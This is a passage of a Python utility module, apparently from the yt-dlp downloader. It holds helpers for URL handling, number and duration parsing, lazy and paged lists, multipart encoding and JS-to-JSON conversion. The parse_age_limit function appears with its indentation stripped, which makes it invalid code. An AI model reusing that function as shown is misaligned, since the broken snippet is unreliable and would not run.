        r'&(?!amp;|lt;|gt;|apos;|quot;|#x[0-9a-fA-F]{,4};|#[0-9]{,4};)',
        '&amp;',
        xml_str)
def setproctitle(title):
    """Best-effort: set the process name shown by tools like ps
    (glibc prctl PR_SET_NAME; silently a no-op elsewhere)."""
    assert isinstance(title, compat_str)
    # ctypes in Jython is not complete
    # http://bugs.jython.org/issue2148
    if sys.platform.startswith('java'):
        return
    try:
        libc = ctypes.cdll.LoadLibrary('libc.so.6')
    except OSError:
        return
    except TypeError:
        # LoadLibrary in Windows Python 2.7.13 only expects
        # a bytestring, but since unicode_literals turns
        # every string into a unicode string, it fails.
        return
    encoded = title.encode('utf-8')
    buf = ctypes.create_string_buffer(len(encoded))
    buf.value = encoded
    try:
        # 15 == PR_SET_NAME
        libc.prctl(15, buf, 0, 0, 0)
    except AttributeError:
        return  # Strange libc, just skip this
def remove_start(s, start):
    """Strip *start* from the beginning of *s* if present (None-safe)."""
    if s is not None and s.startswith(start):
        return s[len(start):]
    return s
def remove_end(s, end):
    """Strip *end* from the end of *s* if present (None-safe).

    Guards against an empty *end*: the previous one-liner computed
    s[:-len(end)] which for end == '' is s[:-0] == s[:0] == '',
    silently discarding the whole string.
    """
    if s is not None and end and s.endswith(end):
        return s[:-len(end)]
    return s
def remove_quotes(s):
    """Strip one matching pair of surrounding quotes (single or double)."""
    if s is None or len(s) < 2:
        return s
    for q in ('"', "'", ):
        if s[0] == q and s[-1] == q:
            return s[1:-1]
    return s
def get_domain(url):
    """Extract the domain from *url*, ignoring scheme and 'www.' prefix."""
    m = re.match(r'(?:https?:\/\/)?(?:www\.)?(?P<domain>[^\n\/]+\.[^\n\/]+)(?:\/(.*))?', url)
    if m is None:
        return None
    return m.group('domain')
def url_basename(url):
    """Return the last path component of *url*."""
    parsed_path = compat_urlparse.urlparse(url).path
    return parsed_path.strip('/').split('/')[-1]
def base_url(url):
    """Return *url* truncated after the last '/' preceding any query/fragment."""
    m = re.match(r'https?://[^?#&]+/', url)
    return m.group()
def urljoin(base, path):
    """Join *base* and *path* like compat_urlparse.urljoin, tolerating
    bytes input and returning None for unusable arguments."""
    if isinstance(path, bytes):
        path = path.decode('utf-8')
    if not isinstance(path, compat_str) or not path:
        return None
    if re.match(r'^(?:[a-zA-Z][a-zA-Z0-9+-.]*:)?//', path):
        # Path is already absolute (has a scheme or is protocol-relative)
        return path
    if isinstance(base, bytes):
        base = base.decode('utf-8')
    # Only join onto http(s) or protocol-relative bases
    if not isinstance(base, compat_str) or not re.match(
            r'^(?:https?:)?//', base):
        return None
    return compat_urlparse.urljoin(base, path)
class HEADRequest(compat_urllib_request.Request):
    """Request subclass that always issues a HEAD request."""
    def get_method(self):
        return 'HEAD'
class PUTRequest(compat_urllib_request.Request):
    """Request subclass that always issues a PUT request."""
    def get_method(self):
        return 'PUT'
def int_or_none(v, scale=1, default=None, get_attr=None, invscale=1):
    """Coerce *v* (optionally an attribute of it) to int, applying
    invscale/scale; return *default* when conversion is impossible."""
    if get_attr and v is not None:
        v = getattr(v, get_attr, None)
    if v is None or v == '':
        return default
    try:
        return int(v) * invscale // scale
    except (ValueError, TypeError):
        return default
def str_or_none(v, default=None):
    """Stringify *v*, or return *default* when it is None."""
    if v is None:
        return default
    return compat_str(v)
def str_to_int(int_str):
    """ A more relaxed version of int_or_none """
    if isinstance(int_str, compat_integer_types):
        return int_str
    if isinstance(int_str, compat_str):
        # Drop thousands separators, decimal points and stray '+' signs
        return int_or_none(re.sub(r'[,\.\+]', '', int_str))
def float_or_none(v, scale=1, invscale=1, default=None):
    """Coerce *v* to float, applying invscale/scale; fall back to *default*."""
    if v is None:
        return default
    try:
        return invscale * float(v) / scale
    except (ValueError, TypeError):
        return default
def bool_or_none(v, default=None):
    """Return *v* only when it is an actual bool; otherwise *default*."""
    if isinstance(v, bool):
        return v
    return default
def strip_or_none(v, default=None):
    """Strip whitespace from a string; return *default* for non-strings."""
    if isinstance(v, compat_str):
        return v.strip()
    return default
def url_or_none(url):
    """Return the stripped URL when it looks like a supported scheme
    (http(s), rtmp variants, rtsp, mms, ftp(s)) or is protocol-relative."""
    if not url or not isinstance(url, compat_str):
        return None
    url = url.strip()
    if re.match(r'^(?:(?:https?|rt(?:m(?:pt?[es]?|fp)|sp[su]?)|mms|ftps?):)?//', url):
        return url
    return None
def strftime_or_none(timestamp, date_format, default=None):
    """Format a unix timestamp (number) or YYYYMMDD string using
    *date_format*; return *default* on any failure."""
    try:
        if isinstance(timestamp, compat_numeric_types):  # unix timestamp
            dt = datetime.datetime.utcfromtimestamp(timestamp)
        elif isinstance(timestamp, compat_str):  # assume YYYYMMDD
            dt = datetime.datetime.strptime(timestamp, '%Y%m%d')
        else:
            # Leaves dt unset as None -> AttributeError below -> default
            dt = None
        return dt.strftime(date_format)
    except (ValueError, TypeError, AttributeError):
        return default
def parse_duration(s):
    """Parse a duration string into seconds (float), or None.

    Tries, in order: '[[DD:]HH:]MM:SS[.ms]' clock notation, an
    ISO-8601-like 'P...T1H2M3S' / verbose '1 hour 20 mins' form, and a
    decimal 'X.Y hours'/'X.Y mins' form.
    """
    if not isinstance(s, compat_basestring):
        return None
    s = s.strip()
    days, hours, mins, secs, ms = [None] * 5
    m = re.match(r'(?:(?:(?:(?P<days>[0-9]+):)?(?P<hours>[0-9]+):)?(?P<mins>[0-9]+):)?(?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?Z?$', s)
    if m:
        days, hours, mins, secs, ms = m.groups()
    else:
        m = re.match(
            r'''(?ix)(?:P?
                (?:
                    [0-9]+\s*y(?:ears?)?\s*
                )?
                (?:
                    [0-9]+\s*m(?:onths?)?\s*
                )?
                (?:
                    [0-9]+\s*w(?:eeks?)?\s*
                )?
                (?:
                    (?P<days>[0-9]+)\s*d(?:ays?)?\s*
                )?
                T)?
                (?:
                    (?P<hours>[0-9]+)\s*h(?:ours?)?\s*
                )?
                (?:
                    (?P<mins>[0-9]+)\s*m(?:in(?:ute)?s?)?\s*
                )?
                (?:
                    (?P<secs>[0-9]+)(?P<ms>\.[0-9]+)?\s*s(?:ec(?:ond)?s?)?\s*
                )?Z?$''', s)
        if m:
            days, hours, mins, secs, ms = m.groups()
        else:
            # Last resort: decimal hours or minutes ('1.5 hours')
            m = re.match(r'(?i)(?:(?P<hours>[0-9.]+)\s*(?:hours?)|(?P<mins>[0-9.]+)\s*(?:mins?\.?|minutes?)\s*)Z?$', s)
            if m:
                hours, mins = m.groups()
            else:
                return None
    duration = 0
    if secs:
        duration += float(secs)
    if mins:
        duration += float(mins) * 60
    if hours:
        duration += float(hours) * 60 * 60
    if days:
        duration += float(days) * 24 * 60 * 60
    if ms:
        # ms still carries its leading '.' (e.g. '.123'), so float() works
        duration += float(ms)
    return duration
def prepend_extension(filename, ext, expected_real_ext=None):
    """Insert *ext* before the real extension of *filename*, or append it
    when the current extension isn't *expected_real_ext*."""
    name, real_ext = os.path.splitext(filename)
    if expected_real_ext and real_ext[1:] != expected_real_ext:
        return '{0}.{1}'.format(filename, ext)
    return '{0}.{1}{2}'.format(name, ext, real_ext)
def replace_extension(filename, ext, expected_real_ext=None):
    """Replace the extension of *filename* with *ext*; append instead
    when the current extension isn't *expected_real_ext*."""
    name, real_ext = os.path.splitext(filename)
    if expected_real_ext and real_ext[1:] != expected_real_ext:
        base = filename
    else:
        base = name
    return '{0}.{1}'.format(base, ext)
def check_executable(exe, args=[]):
    """ Checks if the given binary is installed somewhere in PATH, and returns its name.
    args can be a list of arguments for a short output (like -version) """
    try:
        proc = subprocess.Popen(
            [exe] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        process_communicate_or_kill(proc)
    except OSError:
        return False
    return exe
def get_exe_version(exe, args=['--version'],
                    version_re=None, unrecognized='present'):
    """ Returns the version of the specified executable,
    or False if the executable is not present """
    try:
        # STDIN should be redirected too. On UNIX-like systems, ffmpeg triggers
        # SIGTTOU if yt-dlp is run in the background.
        # See https://github.com/ytdl-org/youtube-dl/issues/955#issuecomment-209789656
        proc = subprocess.Popen(
            [encodeArgument(exe)] + args,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        out, _ = process_communicate_or_kill(proc)
    except OSError:
        return False
    if isinstance(out, bytes):  # Python 2.x
        out = out.decode('ascii', 'ignore')
    return detect_exe_version(out, version_re, unrecognized)
def detect_exe_version(output, version_re=None, unrecognized='present'):
    """Pick the version number out of an executable's --version output."""
    assert isinstance(output, compat_str)
    if version_re is None:
        version_re = r'version\s+([-0-9._a-zA-Z]+)'
    m = re.search(version_re, output)
    return m.group(1) if m else unrecognized
class LazyList(collections.Sequence):
    ''' Lazy immutable list from an iterable
    Note that slices of a LazyList are lists and not LazyList'''
    # NOTE(review): collections.Sequence was removed in Python 3.10 in
    # favour of collections.abc.Sequence - confirm the supported Python
    # range before relying on this base class.
    def __init__(self, iterable):
        self.__iterable = iter(iterable)
        self.__cache = []
        # Logical reversal flag; the cache itself always stays in
        # original iteration order
        self.__reversed = False
    def __iter__(self):
        if self.__reversed:
            # We need to consume the entire iterable to iterate in reverse
            yield from self.exhaust()
            return
        yield from self.__cache
        for item in self.__iterable:
            self.__cache.append(item)
            yield item
    def __exhaust(self):
        # Drain the iterable into the cache and return the cache
        self.__cache.extend(self.__iterable)
        return self.__cache
    def exhaust(self):
        ''' Evaluate the entire iterable '''
        return self.__exhaust()[::-1 if self.__reversed else 1]
    @staticmethod
    def __reverse_index(x):
        # Map index x in reversed order to the equivalent negative index
        # in original order
        return -(x + 1)
    def __getitem__(self, idx):
        if isinstance(idx, slice):
            step = idx.step or 1
            start = idx.start if idx.start is not None else 0 if step > 0 else -1
            stop = idx.stop if idx.stop is not None else -1 if step > 0 else 0
            if self.__reversed:
                (start, stop), step = map(self.__reverse_index, (start, stop)), -step
            idx = slice(start, stop, step)
        elif isinstance(idx, int):
            if self.__reversed:
                idx = self.__reverse_index(idx)
            start = stop = idx
        else:
            raise TypeError('indices must be integers or slices')
        if start < 0 or stop < 0:
            # We need to consume the entire iterable to be able to slice from the end
            # Obviously, never use this with infinite iterables
            return self.__exhaust()[idx]
        # Extend the cache only as far as the requested indices need
        n = max(start, stop) - len(self.__cache) + 1
        if n > 0:
            self.__cache.extend(itertools.islice(self.__iterable, n))
        return self.__cache[idx]
    def __bool__(self):
        try:
            self[-1] if self.__reversed else self[0]
        except IndexError:
            return False
        return True
    def __len__(self):
        self.exhaust()
        return len(self.__cache)
    def reverse(self):
        self.__reversed = not self.__reversed
        return self
    def __repr__(self):
        # repr and str should mimic a list. So we exhaust the iterable
        return repr(self.exhaust())
    def __str__(self):
        return repr(self.exhaust())
class PagedList(object):
    """Abstract base for sequences whose entries are fetched page by page."""
    def __len__(self):
        # This is only useful for tests
        return len(self.getslice())
    def getslice(self, start, end):
        raise NotImplementedError('This method must be implemented by subclasses')
    def __getitem__(self, idx):
        if not isinstance(idx, int) or idx < 0:
            raise TypeError('indices must be non-negative integers')
        entries = self.getslice(idx, idx + 1)
        if not entries:
            return None
        return entries[0]
class OnDemandPagedList(PagedList):
    """PagedList that fetches pages lazily via *pagefunc*, optionally
    caching each fetched page."""
    def __init__(self, pagefunc, pagesize, use_cache=True):
        self._pagefunc = pagefunc
        self._pagesize = pagesize
        self._use_cache = use_cache
        if use_cache:
            # pagenum -> full (unsliced) page contents
            self._cache = {}
    def getslice(self, start=0, end=None):
        res = []
        for pagenum in itertools.count(start // self._pagesize):
            firstid = pagenum * self._pagesize
            nextfirstid = pagenum * self._pagesize + self._pagesize
            if start >= nextfirstid:
                continue
            page_results = None
            if self._use_cache:
                page_results = self._cache.get(pagenum)
            if page_results is None:
                page_results = list(self._pagefunc(pagenum))
            if self._use_cache:
                # Cache the full page before any slicing below
                self._cache[pagenum] = page_results
            startv = (
                start % self._pagesize
                if firstid <= start < nextfirstid
                else 0)
            endv = (
                ((end - 1) % self._pagesize) + 1
                if (end is not None and firstid <= end <= nextfirstid)
                else None)
            if startv != 0 or endv is not None:
                page_results = page_results[startv:endv]
            res.extend(page_results)
            # A little optimization - if current page is not "full", ie. does
            # not contain page_size videos then we can assume that this page
            # is the last one - there are no more ids on further pages -
            # i.e. no need to query again.
            if len(page_results) + startv < self._pagesize:
                break
            # If we got the whole page, but the next page is not interesting,
            # break out early as well
            if end == nextfirstid:
                break
        return res
class InAdvancePagedList(PagedList):
    """PagedList for which the total page count is known up front."""
    def __init__(self, pagefunc, pagecount, pagesize):
        self._pagefunc = pagefunc
        self._pagecount = pagecount
        self._pagesize = pagesize
    def getslice(self, start=0, end=None):
        res = []
        start_page = start // self._pagesize
        end_page = (
            self._pagecount if end is None else (end // self._pagesize + 1))
        # Number of leading entries of the first page that fall before *start*
        skip_elems = start - start_page * self._pagesize
        # Remaining number of entries still wanted (None = all)
        only_more = None if end is None else end - start
        for pagenum in range(start_page, end_page):
            page = list(self._pagefunc(pagenum))
            if skip_elems:
                page = page[skip_elems:]
                skip_elems = None
            if only_more is not None:
                if len(page) < only_more:
                    only_more -= len(page)
                else:
                    # This page satisfies the request; truncate and stop
                    page = page[:only_more]
                    res.extend(page)
                    break
            res.extend(page)
        return res
def uppercase_escape(s):
    """Decode \\UXXXXXXXX escape sequences embedded in *s*."""
    decode = codecs.getdecoder('unicode_escape')
    return re.sub(
        r'\\U[0-9a-fA-F]{8}',
        lambda m: decode(m.group(0))[0],
        s)
def lowercase_escape(s):
    """Decode \\uXXXX escape sequences embedded in *s*."""
    decode = codecs.getdecoder('unicode_escape')
    return re.sub(
        r'\\u[0-9a-fA-F]{4}',
        lambda m: decode(m.group(0))[0],
        s)
def escape_rfc3986(s):
    """Escape non-ASCII characters as suggested by RFC 3986"""
    # Python 2: quote() needs a byte string
    if sys.version_info < (3, 0) and isinstance(s, compat_str):
        s = s.encode('utf-8')
    # The safe-characters set keeps reserved URI delimiters intact
    return compat_urllib_parse.quote(s, b"%/;:@&=+$,!~*'()?#[]")
def escape_url(url):
    """Escape URL as suggested by RFC 3986"""
    parts = compat_urllib_parse_urlparse(url)
    return parts._replace(
        # Hostnames use IDNA rather than percent-encoding
        netloc=parts.netloc.encode('idna').decode('ascii'),
        path=escape_rfc3986(parts.path),
        params=escape_rfc3986(parts.params),
        query=escape_rfc3986(parts.query),
        fragment=escape_rfc3986(parts.fragment)
    ).geturl()
def read_batch_urls(batch_fd):
    """Read a batch file object and return the list of URLs it contains.

    Blank lines and lines starting with '#', ';' or ']' are treated as
    comments; BOM remnants are stripped. The file object is closed.
    """
    def _clean(line):
        if not isinstance(line, compat_str):
            line = line.decode('utf-8', 'replace')
        # Strip BOM remnants (raw UTF-8 BOM mis-decoded as latin-1, or U+FEFF)
        for bom in ('\xef\xbb\xbf', '\ufeff'):
            if line.startswith(bom):
                line = line[len(bom):]
        line = line.lstrip()
        if not line or line.startswith(('#', ';', ']')):
            return False
        # A "#" is part of the URI, unless it follows whitespace — then it
        # starts a trailing comment that is safe to strip
        return re.split(r'\s#', line, 1)[0].rstrip()
    with contextlib.closing(batch_fd) as fd:
        return [url for url in (_clean(line) for line in fd) if url]
def urlencode_postdata(*args, **kargs):
    """URL-encode POST data and return it as ASCII bytes."""
    encoded = compat_urllib_parse_urlencode(*args, **kargs)
    return encoded.encode('ascii')
def update_url_query(url, query):
    """Return *url* with the parameters from *query* merged into its query string."""
    if not query:
        return url
    parsed = compat_urlparse.urlparse(url)
    merged = compat_parse_qs(parsed.query)
    merged.update(query)
    new_query = compat_urllib_parse_urlencode(merged, True)
    return compat_urlparse.urlunparse(parsed._replace(query=new_query))
def update_Request(req, url=None, data=None, headers=None, query=None):
    """Return a copy of *req* with URL/data/headers/query overrides applied.

    The request class (HEADRequest/PUTRequest/plain Request) is chosen from
    the original's HTTP method so the clone keeps the same verb. The original
    request object is not modified.
    """
    # NOTE: headers/query previously used mutable {} defaults; None defaults
    # avoid the shared-mutable-default pitfall while accepting the same calls.
    req_headers = req.headers.copy()
    if headers:
        req_headers.update(headers)
    req_data = data or req.data
    # update_url_query() is a no-op for a falsy query, so passing None is safe
    req_url = update_url_query(url or req.get_full_url(), query)
    req_get_method = req.get_method()
    if req_get_method == 'HEAD':
        req_type = HEADRequest
    elif req_get_method == 'PUT':
        req_type = PUTRequest
    else:
        req_type = compat_urllib_request.Request
    new_req = req_type(
        req_url, data=req_data, headers=req_headers,
        origin_req_host=req.origin_req_host, unverifiable=req.unverifiable)
    # urllib requests only grow a timeout attribute once one is assigned
    if hasattr(req, 'timeout'):
        new_req.timeout = req.timeout
    return new_req
def _multipart_encode_impl(data, boundary):
    """Serialize *data* (a dict) as multipart/form-data using *boundary*.

    Raises ValueError when the boundary occurs inside a field, so the caller
    can retry with a different boundary.
    """
    content_type = 'multipart/form-data; boundary=%s' % boundary
    boundary_bytes = boundary.encode('ascii')
    out = b''
    for name, value in data.items():
        out += b'--' + boundary_bytes + b'\r\n'
        if isinstance(name, compat_str):
            name = name.encode('utf-8')
        if isinstance(value, compat_str):
            value = value.encode('utf-8')
        # RFC 2047 requires non-ASCII field names to be encoded, while RFC 7578
        # suggests sending UTF-8 directly. Firefox sends UTF-8, too
        part = b'Content-Disposition: form-data; name="' + name + b'"\r\n\r\n' + value + b'\r\n'
        if boundary_bytes in part:
            raise ValueError('Boundary overlaps with data')
        out += part
    out += b'--' + boundary_bytes + b'--\r\n'
    return out, content_type
def multipart_encode(data, boundary=None):
    '''
    Encode a dict to RFC 7578-compliant form-data
    data:
        A dict where keys and values can be either Unicode or bytes-like
        objects.
    boundary:
        If specified a Unicode object, it's used as the boundary. Otherwise
        a random boundary is generated.
    Reference: https://tools.ietf.org/html/rfc7578
    '''
    user_supplied = boundary is not None
    while True:
        if boundary is None:
            boundary = '---------------' + str(random.randrange(0x0fffffff, 0xffffffff))
        try:
            # Returns (encoded_bytes, content_type)
            return _multipart_encode_impl(data, boundary)
        except ValueError:
            # Boundary collided with the payload: fatal if the caller chose
            # it, otherwise pick a fresh random one and retry
            if user_supplied:
                raise
            boundary = None
def dict_get(d, key_or_keys, default=None, skip_false_values=True):
    """Look up a key, or the first usable key from a list/tuple of keys.

    None values are always skipped; falsy values are skipped too unless
    skip_false_values is False. Returns *default* when nothing matches.
    """
    if not isinstance(key_or_keys, (list, tuple)):
        return d.get(key_or_keys, default)
    for candidate in key_or_keys:
        value = d.get(candidate)
        if value is None:
            continue
        if skip_false_values and not value:
            continue
        return value
    return default
def try_get(src, getter, expected_type=None):
    """Apply getter(s) to src, returning the first result of the expected type.

    Lookup errors (missing attribute/key/index, bad type) are swallowed;
    returns None implicitly when nothing matches.
    """
    for extract in variadic(getter):
        try:
            value = extract(src)
        except (AttributeError, KeyError, TypeError, IndexError):
            continue
        if expected_type is None or isinstance(value, expected_type):
            return value
def merge_dicts(*dicts):
    """Merge dicts left to right; the first non-None value for a key wins.

    Exception: an empty string already stored can be replaced by a later
    non-empty string for the same key. None values are never stored.
    """
    merged = {}
    for current in dicts:
        for key, value in current.items():
            if value is None:
                continue
            if key not in merged:
                merged[key] = value
            elif (isinstance(value, compat_str) and value
                    and isinstance(merged[key], compat_str)
                    and not merged[key]):
                merged[key] = value
    return merged
def encode_compat_str(string, encoding=preferredencoding(), errors='strict'):
    """Decode *string* to compat_str; values that already are pass through."""
    if isinstance(string, compat_str):
        return string
    return compat_str(string, encoding, errors)
# MPAA movie ratings mapped to minimum viewer ages as used by this project
# (NOTE(review): 'R' -> 16 and 'NC' (NC-17) -> 18 are project choices, not
# official MPAA age cutoffs — confirm before relying on exact values)
US_RATINGS = {
    'G': 0,
    'PG': 10,
    'PG-13': 13,
    'R': 16,
    'NC': 18,
}
# US TV Parental Guidelines ratings mapped to minimum viewer ages;
# consumed by parse_age_limit() below
TV_PARENTAL_GUIDELINES = {
    'TV-Y': 0,
    'TV-Y7': 7,
    'TV-G': 0,
    'TV-PG': 0,
    'TV-14': 14,
    'TV-MA': 17,
}
def parse_age_limit(s):
if type(s) == int:
return s if 0 <= s <= 21 else None
if not isinstance(s, compat_basestring):
return None
m = re.match(r'^(?P<age>\d{1,2})\+?$', s)
if m:
return int(m.group('age'))
s = s.upper()
if s in US_RATINGS:
return US_RATINGS[s]
m = re.match(r'^TV[_-]?(%s)$' % '|'.join(k[3:] for k in TV_PARENTAL_GUIDELINES), s)
if m:
return TV_PARENTAL_GUIDELINES['TV-' + m.group(1)]
return None
def strip_jsonp(code):
    """Strip a JSONP wrapper, returning the raw callback payload.

    Input without a recognizable wrapper is returned unchanged.
    """
    jsonp_pattern = r'''(?sx)^
            (?:window\.)?(?P<func_name>[a-zA-Z0-9_.$]*)
            (?:\s*&&\s*(?P=func_name))?
            \s*\(\s*(?P<callback_data>.*)\);?
            \s*?(?://[^\n]*)*$'''
    return re.sub(jsonp_pattern, r'\g<callback_data>', code)
def js_to_json(code, vars={}):
    """Translate a JavaScript object/value literal into JSON text.

    Handles comments, single-quoted strings, unquoted object keys,
    trailing commas, '!'-prefixed values and hex/octal integers.
    """
    # vars is a dict of var, val pairs to substitute
    COMMENT_RE = r'/\*(?:(?!\*/).)*?\*/|//[^\n]*\n'
    SKIP_RE = r'\s*(?:{comment})?\s*'.format(comment=COMMENT_RE)
    # (pattern, base) pairs for hex and octal integer literals, which may
    # also act as object keys (trailing ':')
    INTEGER_TABLE = (
        (r'(?s)^(0[xX][0-9a-fA-F]+){skip}:?$'.format(skip=SKIP_RE), 16),
        (r'(?s)^(0+[0-7]+){skip}:?$'.format(skip=SKIP_RE), 8),
    )
    def fix_kv(m):
        # Rewrite one token matched by the outer regex into its JSON form
        v = m.group(0)
        if v in ('true', 'false', 'null'):
            return v
        elif v.startswith('/*') or v.startswith('//') or v.startswith('!') or v == ',':
            # Comments, '!'-prefixes and trailing commas are dropped
            return ""
        if v[0] in ("'", '"'):
            # Re-escape the contents of a quoted string for JSON
            v = re.sub(r'(?s)\\.|"', lambda m: {
                '"': '\\"',
                "\\'": "'",
                '\\\n': '',
                '\\x': '\\u00',
            }.get(m.group(0), m.group(0)), v[1:-1])
        else:
            for regex, base in INTEGER_TABLE:
                im = re.match(regex, v)
                if im:
                    i = int(im.group(1), base)
                    # Numeric object keys must be quoted in JSON
                    return '"%d":' % i if v.endswith(':') else '%d' % i
            if v in vars:
                # Bare identifier with a known substitution
                return vars[v]
        return '"%s"' % v
    return re.sub(r'''(?sx)
        "(?:[^"\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^"\\]*"|
        '(?:[^'\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^'\\]*'|
        {comment}|,(?={skip}[\]}}])|
        (?:(?<![0-9])[eE]|[a-df-zA-DF-Z_])[.a-zA-Z_0-9]*|
        \b(?:0[xX][0-9a-fA-F]+|0+[0-7]+)(?:{skip}:)?|
        [0-9]+(?={skip}:)|
        !+
        '''.format(comment=COMMENT_RE, skip=SKIP_RE), fix_kv, code)
def qualities(quality_ids):
    """ Get a numeric quality value out of a list of possible values """
    def rank(quality_id):
        # Position in the list is the quality rank; unknown ids rank lowest
        if quality_id in quality_ids:
            return quality_ids.index(quality_id)
        return -1
    return rank
# Default output filename templates, keyed by template type
DEFAULT_OUTTMPL = {
    'default': '%(title)s [%(id)s].%(ext)s',
    'chapter': '%(title)s - %(section_number)03d %(section_title)s [%(id)s].%(ext)s',
}
# Known output template types; the value is apparently the default filename
# component used for that type, None meaning no extra component
# (NOTE(review): confirm against the code consuming OUTTMPL_TYPES)
OUTTMPL_TYPES = {
    'chapter': None,
    'subtitle': None,
    'thumbnail': None,
    'description': 'description',
    'annotation': 'annotations.xml',
    'infojson': 'info.json',
    'pl_thumbnail': None,
    'pl_description': 'description',
    'pl_infojson': 'info.json',
}
# As of [1] format syntax is:
# %[mapping_key][conversion_flags][minimum_width][.precision][length_modifier]type
# 1. https://docs.python.org/2/library/stdtypes.html#string-formatting
STR_FORMAT_RE = r'''(?x)
(?<!%)
%
(?P<has_key>\((?P<key>{0})\))? # mapping key
(?P<format>
(?:[#0\-+ ]+)? # conversion flags (optional)
(?:\d+)? # minimum field width (optional)
(?:\.\d+)? # precision (optional)
[hlL]? # length modifier (optional)
[diouxXeEfFgGcrs] # conversion type
)
'''
def limit_length(s, length):
    """ Add ellipses to overly long strings """
    if s is None:
        return None
    suffix = '...'
    # Keep the total length at most `length`, ellipsis included
    return s if len(s) <= length else s[:length - len(suffix)] + suffix
def version_tuple(v):
    """Split a dotted/dashed version string into a tuple of ints."""
    return tuple(map(int, re.split(r'[-.]', v)))
def is_outdated_version(version, limit, assume_new=True):
    """Compare version strings; on missing/unparseable input fall back to
    the assume_new default (True means 'treat as up to date')."""
    if not version:
        return not assume_new
    try:
        outdated = version_tuple(version) < version_tuple(limit)
    except ValueError:
        return not assume_new
    return outdated
def ytdl_is_updateable():
    """ Returns if yt-dlp can be updated with -U """
    # Self-update is hard-disabled: the code below the early return is
    # unreachable, apparently kept for when updating is re-enabled —
    # TODO(review): confirm before removing
    return False
    from zipimport import zipimporter
    return isinstance(globals().get('__loader__'), zipimporter) or hasattr(sys, 'frozen')
def args_to_str(args):
    """Render a subprocess argument list as a short shell-quoted string."""
    quoted = (compat_shlex_quote(arg) for arg in args)
    return ' '.join(quoted)
def error_to_compat_str(err):
    """Stringify an exception, decoding byte messages on Python 2."""
    message = str(err)
    # On python 2 an error byte string must be decoded with the locale
    # encoding rather than ascii
    if sys.version_info[0] < 3:
        message = message.decode(preferredencoding())
    return message
def mimetype2ext(mt):
    """Map a MIME type to a filename extension; None passes through.

    Unknown subtypes are returned as-is (lowercased, parameters stripped).
    """
    if mt is None:
        return None
    # Full-type matches take precedence over subtype matches
    FULL_MAP = {
        'audio/mp4': 'm4a',
        # Per RFC 3003, audio/mpeg can be .mp1, .mp2 or .mp3. Here use .mp3 as
        # it's the most popular one
        'audio/mpeg': 'mp3',
        'audio/x-wav': 'wav',
    }
    if mt in FULL_MAP:
        return FULL_MAP[mt]
    # Fall back to the subtype, with any ';'-separated parameters removed
    subtype = mt.rpartition('/')[2].split(';')[0].strip().lower()
    SUBTYPE_MAP = {
        '3gpp': '3gp',
        'smptett+xml': 'tt',
        'ttaf+xml': 'dfxp',
        'ttml+xml': 'ttml',
        'x-flv': 'flv',
        'x-mp4-fragmented': 'mp4',
        'x-ms-sami': 'sami',
        'x-ms-wmv': 'wmv',
        'mpegurl': 'm3u8',
        'x-mpegurl': 'm3u8',
        'vnd.apple.mpegurl': 'm3u8',
        'dash+xml': 'mpd',
        'f4m+xml': 'f4m',
        'hds+xml': 'f4m',
        'vnd.ms-sstr+xml': 'ism',
        'quicktime': 'mov',
        'mp2t': 'ts',
        'x-wav': 'wav',
    }
    return SUBTYPE_MAP.get(subtype, subtype)
def parse_codecs(codecs_str):
    """Split an RFC 6381 codecs string into vcodec/acodec entries.

    http://tools.ietf.org/html/rfc6381
    Returns {} when nothing can be classified; fills the missing side with
    'none' when at least one codec is recognized.
    """
    if not codecs_str:
        return {}
    entries = [part.strip() for part in codecs_str.strip().strip(',').split(',') if part.strip()]
    VIDEO_CODECS = ('avc1', 'avc2', 'avc3', 'avc4', 'vp9', 'vp8', 'hev1', 'hev2', 'h263', 'h264', 'mp4v', 'hvc1', 'av01', 'theora')
    AUDIO_CODECS = ('mp4a', 'opus', 'vorbis', 'mp3', 'aac', 'ac-3', 'ec-3', 'eac3', 'dtsc', 'dtse', 'dtsh', 'dtsl')
    vcodec = acodec = None
    for full_codec in entries:
        # Classify by the base identifier before any '.' profile suffix
        base = full_codec.split('.')[0]
        if base in VIDEO_CODECS:
            vcodec = vcodec or full_codec
        elif base in AUDIO_CODECS:
            acodec = acodec or full_codec
        else:
            write_string('WARNING: Unknown codec %s\n' % full_codec, sys.stderr)
    if not vcodec and not acodec:
        # With exactly two unclassified entries, assume video+audio order
        if len(entries) == 2:
            return {
                'vcodec': entries[0],
                'acodec': entries[1],
            }
        return {}
    return {
        'vcodec': vcodec or 'none',
        'acodec': acodec or 'none',
    }
def urlhandle_detect_ext(url_handle):
    """Guess a file extension from a response's headers.

    Prefers the Content-Disposition filename; falls back to Content-Type.
    """
    headers = url_handle.headers
    content_disposition = headers.get('Content-Disposition')
    if content_disposition:
        mobj = re.match(r'attachment;\s*filename="(?P<filename>[^"]+)"', content_disposition)
        if mobj:
            ext = determine_ext(mobj.group('filename'), default_ext=None)
            if ext:
                return ext
    return mimetype2ext(headers.get('Content-Type'))
def encode_data_uri(data, mime_type):
    """Build an RFC 2397 'data:' URI with a base64 payload."""
    payload = base64.b64encode(data).decode('ascii')
    return 'data:%s;base64,%s' % (mime_type, payload)
def age_restricted(content_limit, age_limit):
    """ Returns True iff the content should be blocked """
    # No viewer limit configured, or content carries no restriction
    if age_limit is None or content_limit is None:
        return False
    return age_limit < content_limit
def is_html(first_bytes):
    """ Detect whether a file contains HTML by examining its first bytes. """
    # Order matters: UTF-32 BOMs must be tested before their UTF-16 prefixes
    BOMS = [
        (b'\xef\xbb\xbf', 'utf-8'),
        (b'\x00\x00\xfe\xff', 'utf-32-be'),
        (b'\xff\xfe\x00\x00', 'utf-32-le'),
        (b'\xff\xfe', 'utf-16-le'),
        (b'\xfe\xff', 'utf-16-be'),
    ]
    decoded = first_bytes.decode('utf-8', 'replace')
    for bom, enc in BOMS:
        if first_bytes.startswith(bom):
            decoded = first_bytes[len(bom):].decode(enc, 'replace')
            break
    return re.match(r'^\s*<', decoded)
def determine_protocol(info_dict):
    """Infer the download protocol for an info dict.

    An explicit 'protocol' entry wins; otherwise the URL scheme prefix,
    then the file extension, then the parsed URL scheme decide.
    """
    explicit = info_dict.get('protocol')
    if explicit is not None:
        return explicit
    url = info_dict['url']
    for prefix in ('rtmp', 'mms', 'rtsp'):
        if url.startswith(prefix):
            return prefix
    ext = determine_ext(url)
